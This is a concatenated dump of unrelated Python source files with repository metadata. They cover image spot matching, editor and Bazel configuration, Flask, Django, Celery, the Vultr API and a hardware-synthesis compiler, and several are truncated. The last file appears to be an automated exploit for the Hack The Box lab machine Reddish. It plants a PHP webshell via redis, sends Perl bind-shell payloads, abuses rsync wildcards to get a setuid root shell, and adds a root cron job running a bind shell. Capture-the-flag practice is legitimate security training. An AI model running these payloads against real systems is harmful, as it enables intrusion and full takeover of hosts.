**kwargs,
).astype(int)
intensities = image[spots[:, 0], spots[:, 1], spots[:, 2]]
return np.hstack((spots[:, :3], intensities[..., None]))
def get_spot_context(image, spots, vox, radius):
"""
"""
output = []
for spot in spots:
s = (spot/vox).astype(int)
w = image[s[0]-radius:s[0]+radius+1,
s[1]-radius:s[1]+radius+1,
s[2]-radius:s[2]+radius+1]
output.append( [spot, w] )
return output
def _stats(arr):
"""
"""
# compute mean and standard deviation along columns
arr = arr.astype(np.float64)
means = np.mean(arr, axis=1)
sqr_means = np.mean(np.square(arr), axis=1)
stddevs = np.sqrt( sqr_means - np.square(means) )
return means, stddevs
def pairwise_correlation(A, B):
"""
"""
# grab and flatten context
a_con = np.array( [a[1].flatten() for a in A] )
b_con = np.array( [b[1].flatten() for b in B] )
# get means and std for all contexts, center contexts
a_mean, a_std = _stats(a_con)
b_mean, b_std = _stats(b_con)
a_con = a_con - a_mean[..., None]
b_con = b_con - b_mean[..., None]
# compute pairwise correlations
corr = np.matmul(a_con, b_con.T)
corr = corr / a_std[..., None]
corr = corr / b_std[None, ...]
corr = corr / a_con.shape[1]
# contexts with no variability are nan, set to 0
corr[np.isnan(corr)] = 0
return corr
def match_points(A, B, scores, threshold):
"""
"""
# split positions from context
a_pos = np.array( [a[0] for a in A] )
b_pos = np.array( [b[0] for b in B] )
# get highest scores above threshold
best_indcs = np.argmax(scores, axis=1)
a_indcs = range(len(a_pos))
keeps = scores[(a_indcs, best_indcs)] > threshold
# return positions of corresponding points
return a_pos[keeps, :3], b_pos[best_indcs[keeps], :3]
| 24.27957 | 62 | 0.59566 |
91fc1d22637f7a669f85b81d4edd4e86d5957148 | 8,736 | py | Python | .ycm_extra_conf.py | zaucy/bazel-compilation-database | aa58494efdf31c3e3525832b3d44d48bb3bc2b0b | [
"Apache-2.0"
] | 1 | 2021-04-23T03:47:31.000Z | 2021-04-23T03:47:31.000Z | .ycm_extra_conf.py | tsingakbar/bazel-compilation-database | a1d592dd8c3423c7fe94933ead4f098353ad4436 | [
"Apache-2.0"
] | null | null | null | .ycm_extra_conf.py | tsingakbar/bazel-compilation-database | a1d592dd8c3423c7fe94933ead4f098353ad4436 | [
"Apache-2.0"
] | 1 | 2020-11-14T00:11:51.000Z | 2020-11-14T00:11:51.000Z | #!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
"""Returns a dict containing key values from bazel info."""
bazel_info_dict = dict()
try:
out = subprocess.check_output([_BAZEL, 'info']).decode('utf-8').strip().split('\n')
except subprocess.CalledProcessError as err:
# This exit code is returned when this command is run outside of a bazel workspace.
if err.returncode == 2:
sys.exit(0)
for line in out:
key_val = line.strip().partition(": ")
bazel_info_dict[key_val[0]] = key_val[2]
return bazel_info_dict
def bazel_query(args):
"""Executes bazel query with the given args and returns the output."""
# TODO: switch to cquery when it supports siblings and less crash-y with external repos.
query_cmd = [_BAZEL, 'query'] + args
proc = subprocess.Popen(query_cmd, stdout=subprocess.PIPE)
return proc.communicate()[0].decode('utf-8')
def file_to_target(filepath):
"""Returns a string that works as a bazel target specification for the given file."""
if not filepath.startswith("external/"):
# The file path relative to repo root works for genfiles and binfiles too.
return filepath
# For external repos, we have to find the owner package manually.
repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
filepath = re.sub('external/[^/]*/', '', filepath)
# Find out which package is the owner of this file.
query_result = bazel_query(['-k', repo_prefix+'...', '--output=package'])
packages = [package.strip() for package in query_result.split('\n')]
owner = ""
for package in packages:
package = package[len(repo_prefix):]
if filepath.startswith(package) and len(package) > len(owner):
owner = package
return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
"""For file targets that are not source files, return the target that generated them.
This is needed because rdeps of generated files do not include targets that reference
their generating rules.
https://github.com/bazelbuild/bazel/issues/4949
"""
query_result = bazel_query(['--output=xml', file_target])
if not query_result:
sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
target_xml = ElementTree.fromstringlist(query_result.split('\n'))
source_element = target_xml.find('source-file')
if source_element is not None:
return file_target
generated_element = target_xml.find('generated-file')
if generated_element is not None:
return generated_element.get('generating-rule')
sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
"""Gets the file path for the generated aspects file that contains the
compile commands json entries.
"""
target_path = re.sub(':', '/', label)
target_path = re.sub('^@(.*)//', 'external/\\1/', target_path)
target_path = re.sub('^/*', '', target_path)
relative_file_path = target_path + '.compile_commands.json'
return os.path.join(bazel_bin, *relative_file_path.split('/'))
def get_compdb_json(aspects_filepath, bazel_exec_root):
"""Returns the JSON string read from the file after necessary processing."""
compdb_json_str = "[\n"
with open(aspects_filepath, 'r') as aspects_file:
compdb_json_str += aspects_file.read()
compdb_json_str += "\n]"
return re.sub('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)
def get_flags(filepath, compdb_json_str):
"""Gets the compile command flags from the compile command for the file."""
compdb_dict = json.loads(compdb_json_str)
for entry in compdb_dict:
if entry['file'] != filepath:
continue
command = entry['command']
return shlex.split(command)[1:]
# This could imply we are fetching the wrong compile_commands.json or there
# is a bug in aspects.bzl.
sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
"""Modifies flags obtained from the compile command for compilation outside of bazel."""
# We need to add the workspace directly because the files symlinked in the
# execroot during a build disappear after a different build action.
flags.extend(['-iquote', bazel_workspace])
return flags
def cfamily_settings(filename):
"""Returns C-family settings as a dict with at least a 'flags' key that
points to an array of strings as flags.
"""
bazel_info_dict = bazel_info()
bazel_bin = bazel_info_dict['bazel-bin']
bazel_genfiles = bazel_info_dict['bazel-genfiles']
bazel_exec_root = bazel_info_dict['execution_root']
bazel_workspace = bazel_info_dict['workspace']
os.chdir(bazel_workspace)
# Valid prefixes for the file, in decreasing order of specificity.
file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
if filename.startswith(p)]
if not file_prefix:
sys.exit("Not a valid file: " + filename)
filepath = os.path.relpath(filename, file_prefix[0])
file_target = standardize_file_target(file_to_target(filepath))
# File path relative to execroot, as it will appear in the compile command.
if file_prefix[0].startswith(bazel_exec_root):
filepath = os.path.relpath(filename, bazel_exec_root)
cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
.format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
if not labels:
sys.exit("No cc rules depend on this source file.")
repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
os.path.realpath(__file__))
aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
bazel_aspects = [
_BAZEL,
'build',
aspect_definition,
repository_override,
'--output_groups=compdb_files,header_files',
] + labels
proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
errors = [e for e in out.splitlines() + err.splitlines()
if e.startswith("ERROR:")]
if errors:
raise Exception('/'.join(errors))
else:
raise Exception(err)
aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
return {
'flags': flags,
'include_paths_relative_to_dir': bazel_exec_root,
}
#pylint: disable=C0103
def Settings(**kwargs):
"""Function that is called by YCM with language and filename arguments,
and expects a dict of language-specific settings.
"""
if kwargs['language'] == 'cfamily':
return cfamily_settings(kwargs['filename'])
return {}
# For testing; needs exactly one argument as path of file.
if __name__ == '__main__':
filename = os.path.abspath(sys.argv[1])
print(Settings(language='cfamily', filename=filename))
| 37.333333 | 104 | 0.694254 |
91fc55bd294641a3405ae46e672d73216e1f79e0 | 450 | py | Python | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 10 | 2017-04-25T20:20:14.000Z | 2021-02-26T18:57:59.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 19 | 2018-08-09T20:45:51.000Z | 2021-11-29T17:47:21.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 8 | 2018-06-28T02:54:06.000Z | 2020-02-23T13:34:46.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
| 21.428571 | 50 | 0.615556 |
91fc8f01eba61ef1ef5ef0f60b821056938bce1a | 6,375 | py | Python | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | 1 | 2016-06-22T07:44:38.000Z | 2016-06-22T07:44:38.000Z | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | null | null | null | src/StatifyStats.py | beng92/Statify | 9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5 | [
"MIT"
] | null | null | null | '''
x Total plays
x Total artists
x Total unique songs
Average song per artist
x Favourite track
Favourite artist (by plays or time)
Favourite album (req. api)
Average/total/unique plays per range
Average/total/unique artists per range
Average/total time listened per range
Favourite genre (req. api) (by plays or time)
% songs skipped before end (req. api)
Most skipped song/artist (req. api)
Graph of time of day listening
Graph of day of the week listening
Listening habits by Spotify values e.g. accousticness (req. api)
Search listening history
https://developer.spotify.com/web-api/
https://github.com/plamere/spotipy
http://spotipy.readthedocs.org/en/latest/
http://cgbystrom.com/articles/deconstructing-spotifys-builtin-http-server/
https://github.com/cgbystrom/spotify-local-http-api/issues/2
https://github.com/cgbystrom/spotify-local-http-api
http://effbot.org/zone/wcklib-calendar.htm
http://svn.python.org/projects/sandbox/trunk/ttk-gsoc/samples/ttkcalendar.py
'''
import time, datetime, StatifyCache, logging
# Songs read in order (date, Song) | 35.814607 | 192 | 0.570824 |
91fd994bcee3cd09c51e7f88b4c8df6b65341586 | 861 | py | Python | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 1 | 2022-03-26T20:01:55.000Z | 2022-03-26T20:01:55.000Z | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 4 | 2022-01-23T09:22:53.000Z | 2022-03-26T13:53:36.000Z | web/src/yasg.py | Mikhail-Gorelov/chat_microservice | af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19 | [
"MIT"
] | 2 | 2022-03-17T19:12:41.000Z | 2022-03-30T09:58:50.000Z | from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework import permissions
from rest_framework.authentication import SessionAuthentication
schema_view_param = {
'public': True,
'permission_classes': (permissions.IsAdminUser,),
'url': getattr(settings, 'SWAGGER_URL', None),
'authentication_classes': (SessionAuthentication,),
}
schema_view = get_schema_view(
openapi.Info(
title=settings.MICROSERVICE_TITLE + ' API',
default_version='v1',
description='Microservice description',
),
**schema_view_param,
)
urlpatterns = [
path(
'swagger/', login_required(schema_view.with_ui('swagger', cache_timeout=0)), name='schema-swagger-ui'
),
]
| 28.7 | 109 | 0.738676 |
91fe1b9a7b1cd81006952efe0654f1a6e2066aa1 | 1,889 | py | Python | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 92 | 2017-02-13T22:35:54.000Z | 2021-04-28T09:56:02.000Z | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 4 | 2017-03-05T02:05:05.000Z | 2019-02-23T17:15:34.000Z | src/train.py | mohamedkeid/feed-forward-style-transfer | f7b058d392161018b2988a24dd2f05566da5ac78 | [
"MIT"
] | 36 | 2017-02-24T09:35:57.000Z | 2021-05-21T17:42:03.000Z | #!/usr/bin/python
"""
Author: Mohamed K. Eid (mohamedkeid@gmail.com)
Description: trains a generative model for stylizing an unseen image input with a particular style
Args:
train: path to image with style to learn
"""
import argparse
import os
import tensorflow as tf
import generator
import helpers
import trainer
# Model Hyper Params
CONTENT_LAYER = 'conv3_3'
STYLE_LAYERS = {'conv1_2': .25, 'conv2_2': .25, 'conv3_3': .25, 'conv4_3': .25}
assert sum(STYLE_LAYERS.values()) == 1, "Style layer weights must up to 1"
EPOCHS = 30000
LEARNING_RATE = .001
TRAINING_DIMS = {'height': 256, 'width': 256}
RETRAIN = False
# Loss term weights
CONTENT_WEIGHT = 1.
STYLE_WEIGHT = .3
TV_WEIGHT = .1
# Default image paths
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_DIR_PATH = DIR_PATH + '/../lib/images/train2014/'
TRAINED_MODELS_PATH = DIR_PATH + '/../lib/generators/'
TRAIN_PATH = None
# Logging params and config
PRINT_TRAINING_STATUS = True
PRINT_EVERY_N = 10
helpers.config_logging()
# Parse arguments and assign them to their respective global variables
parse_args()
with tf.Session() as sess:
with tf.variable_scope('generator'):
gen = generator.Generator()
t = trainer.Trainer(sess, gen, TRAIN_PATH, TRAINING_DIMS, PRINT_TRAINING_STATUS, PRINT_EVERY_N)
t.train(EPOCHS, LEARNING_RATE, CONTENT_LAYER, CONTENT_WEIGHT, STYLE_LAYERS, STYLE_WEIGHT, TV_WEIGHT, RETRAIN)
sess.close()
| 28.621212 | 117 | 0.728428 |
91ff58a8a89279f514514042538c466c72a92492 | 9,512 | py | Python | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | xsnake/main.py | wcgbg/kids-keyboard | aaea8e7970407b02d46325654740859e1a7dbd83 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
MIN_MARGIN = 32
PROGRESS_BAR_HEIGHT = 8
SELF_DIR = os.path.dirname(os.path.realpath(__file__))
if __name__ == '__main__':
main()
| 39.305785 | 80 | 0.527965 |
91ff5f7c6e601aeebe16cd2ed27293363ad42fda | 5,342 | py | Python | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | flaskmodel/flask_book_project.py | JennyHan2016/ProxyPool | 2e65547e5d3811db32c5e79c4d70e108e0b1e934 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
#
db = SQLAlchemy(app)
'''
1.
a. Sqlalchemy
b. db
c.
2.
a. db.Model
b. __tablename__
c.
d.
3.
4.
a. forpy
5. WTF
a.
b.
c. secret_key / / csrf_token
6.
a.
b. ID(for else / redirect / url_for )
c.
'''
#
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'hbb'
#
#
#
if __name__ == '__main__':
# db.create_all()
# db.drop_all()
#
# au1 = Author(author_name = 'hbb')
# au2 = Author(author_name = 'ry')
# au3 = Author(author_name = 'rmf')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(book_name = '',author_id = au1.id)
# bk2 = Book(book_name = '',author_id = au1.id)
# bk3 = Book(book_name = '',author_id = au2.id)
# bk4 = Book(book_name = '',author_id = au3.id)
# bk5 = Book(book_name = '',author_id = au3.id)
# db.session.add_all([bk1,bk2,bk3,bk4,bk5])
# db.session.commit()
app.run(debug=True)
| 29.513812 | 137 | 0.588731 |
91ffc327acbe66a0dfdec62b3fb9d0478e21a89a | 1,012 | py | Python | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | 1 | 2022-02-14T09:08:16.000Z | 2022-02-14T09:08:16.000Z | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | 5 | 2021-03-09T22:39:17.000Z | 2022-02-26T19:52:36.000Z | examples/simple_rest_nt.py | rob-blackbourn/bareASGI-tutorial | 736a0e5f6e73c158101be95d0b0f456065549725 | [
"Apache-2.0"
] | null | null | null | import asyncio
import json
from hypercorn.asyncio import serve
from hypercorn.config import Config
from bareasgi import Application, text_reader, text_writer
import bareutils.header as header
app = Application(info={'name': 'Michael Caine'})
app.http_router.add({'GET'}, '/info', get_info)
app.http_router.add({'POST'}, '/info', set_info)
config = Config()
config.bind = ["0.0.0.0:9009"]
asyncio.run(serve(app, config))
| 27.351351 | 65 | 0.690711 |
620015da2fb2461bd1becafb3bfad88fa6ea66e6 | 567 | py | Python | memory/build_memory.py | ngowilliam1/more-contrastive | 50884c369145d19a39edabf56ecfdc02af1b42c4 | [
"Apache-2.0"
] | 70 | 2020-12-04T06:44:57.000Z | 2022-03-30T03:38:55.000Z | memory/build_memory.py | ngowilliam1/more-contrastive | 50884c369145d19a39edabf56ecfdc02af1b42c4 | [
"Apache-2.0"
] | 18 | 2020-12-31T03:57:35.000Z | 2021-10-21T06:41:41.000Z | infomin/build_memory.py | frank-xwang/CLD | 0852e5c3d0f0c28e85668b87b4fff20bd67e3efd | [
"MIT"
] | 6 | 2021-04-13T18:09:14.000Z | 2021-12-14T11:18:23.000Z | from .mem_bank import RGBMem, CMCMem
from .mem_moco import RGBMoCo, CMCMoCo
| 31.5 | 61 | 0.611993 |
6200daab351d8a43f810d28196ac2f8c75e8b726 | 803 | py | Python | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 3 | 2020-09-24T01:36:02.000Z | 2022-03-28T11:53:54.000Z | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | null | null | null | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 1 | 2020-12-08T05:14:23.000Z | 2020-12-08T05:14:23.000Z | # -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')
app = Celery('Aves2')
# Using a string here means the worker don't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
app.conf.timezone = 'Asia/Shanghai'
# Add periodic-tasks
app.conf.beat_schedule = {
}
| 27.689655 | 66 | 0.775841 |
62011193ee986970753cb1015967250f10e93794 | 14,374 | py | Python | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 8 | 2018-09-25T03:28:11.000Z | 2021-12-15T07:44:38.000Z | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 1 | 2020-12-21T10:56:44.000Z | 2020-12-21T10:56:44.000Z | hwtHls/ssa/translation/fromAst/astToSsa.py | Nic30/hwtHls | 1fac6ed128318e698d51e15e9871249ddf243e1c | [
"MIT"
] | 2 | 2018-09-25T03:28:18.000Z | 2021-12-15T10:28:35.000Z | from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
| 45.487342 | 136 | 0.64881 |
6202a8816bac81aec1be652ea835f294593e8695 | 12,009 | py | Python | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 4 | 2021-12-01T18:06:18.000Z | 2022-01-22T12:39:52.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-19T14:05:42.000Z | 2021-12-19T14:05:42.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-20T04:54:08.000Z | 2021-12-20T04:54:08.000Z | from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoanBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
| 39.117264 | 118 | 0.670081 |
62034dcbe266726fc371d74a18776dc2103cd7d1 | 12,848 | py | Python | hacking/HTB/Reddish/autopwn_reddish.py | Qazeer/code-snippets | 6b15afb66312cbcf7c29f9ea32933ad0cbf65154 | [
"Unlicense"
] | 219 | 2017-12-12T20:05:37.000Z | 2022-03-27T06:08:08.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 3 | 2018-11-10T13:33:42.000Z | 2020-10-21T13:53:00.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 108 | 2017-12-17T18:17:14.000Z | 2022-03-15T13:24:44.000Z | #!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
# context.log_level = 'debug'
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
sys.exit()
try:
threading.Thread(target=send_payloads).start()
except Exception as e:
log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
socat.interactive()
sys.exit()
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
output = socat.recvuntil("www-data@www")
if "www-data@www" in output:
p.success("OK (user = www-data@www)")
else:
p.failure("FAIL")
sys.exit()
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
urled_perl_payload = urllib.quote_plus(perl_payload)
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
socat.interactive()
sys.exit()
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
count = 0
while True:
p.status(str(count))
sleep(1)
socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
socat.recvuntil('$ ')
output = socat.recv(3).strip()
if "OK" in output:
p.success("OK")
break
count += 1
if count > 180:
p.failure("FAIL")
sys.exit()
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
socat.interactive()
sys.exit()
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
